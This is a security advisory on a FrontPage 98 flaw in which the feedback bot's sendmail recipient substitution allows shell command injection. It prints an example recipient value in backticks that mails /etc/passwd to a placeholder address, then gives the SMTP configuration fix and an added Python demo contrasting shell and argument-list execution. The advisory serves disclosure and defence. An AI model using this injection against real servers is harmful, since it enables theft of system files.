Front Page 98 retrieve arbitrary file by email
Vulnerability

    Front Page 98

Affected

    *NIX with FP

Description

    Markus Stumpf found the following.  He noticed another weakness,
    which is still present at least in FP98 with the version id:

        FPVersion="3.0.2.1330"

    When a server is installed for FrontPage, a file is created,
    usually /usr/local/frontpage/www.example.com:80.cnf.  To get the
    feedback bot to send feedback via email, you can define within
    this file:

        SendmailCommand:/usr/sbin/sendmail %r

    The "%r" above is substituted with the recipient's email
    address(es).  With this setting you are vulnerable, as creating a
    feedback page with a recipient address of e.g.

        `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`

    will execute the command

        /usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`

    and, because the shell runs the backquoted part first, send the
    password file to nobody@example.com.

Solution

    To avoid this, tell FrontPage to use the SMTP protocol to send
    emails by setting

        SMTPHost:mail.example.com

    and you will probably also want to set

        MailSender:webmaster@example.com
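
    Why the "%r" substitution described above is dangerous, as an added
    example (not FrontPage code and not part of the original advisory):
    echo stands in for /usr/sbin/sendmail, the recipient is a constructed
    harmless value, and the function names and address pattern are
    assumptions.

```python
import re
import shlex
import subprocess

# Constructed stand-in for the SendmailCommand value: echo replaces
# /usr/sbin/sendmail so the example sends nothing and runs offline.
TEMPLATE = "echo RCPT %r"
# Constructed, harmless recipient using the same backtick syntax as the advisory.
HOSTILE = "`echo INJECTED`"

# Conservative allow-list for a single address (an assumption, not RFC 5322).
ADDRESS = re.compile(r"[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\Z")


def run_shell(template, recipient):
    """Vulnerable pattern: %r is pasted into a string that /bin/sh parses."""
    line = template.replace("%r", recipient)
    return subprocess.run(line, shell=True, capture_output=True, text=True).stdout


def to_argv(template, recipient):
    """Split the template first, then substitute, so the recipient stays ONE argument."""
    return [tok.replace("%r", recipient) for tok in shlex.split(template)]


def run_argv(template, recipient):
    """No shell involved: backticks reach the program as literal characters."""
    argv = to_argv(template, recipient)
    return subprocess.run(argv, capture_output=True, text=True).stdout


def check_recipient(recipient):
    """Reject anything that is not a plain address or could be read as an option."""
    if recipient.startswith("-") or not ADDRESS.match(recipient):
        raise ValueError("rejected recipient: %r" % recipient)
    return recipient


if __name__ == "__main__":
    print("shell:", run_shell(TEMPLATE, HOSTILE).strip())  # substitution ran
    print("argv: ", run_argv(TEMPLATE, HOSTILE).strip())   # stayed literal
    try:
        check_recipient(HOSTILE)
    except ValueError as exc:
        print(exc)
```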
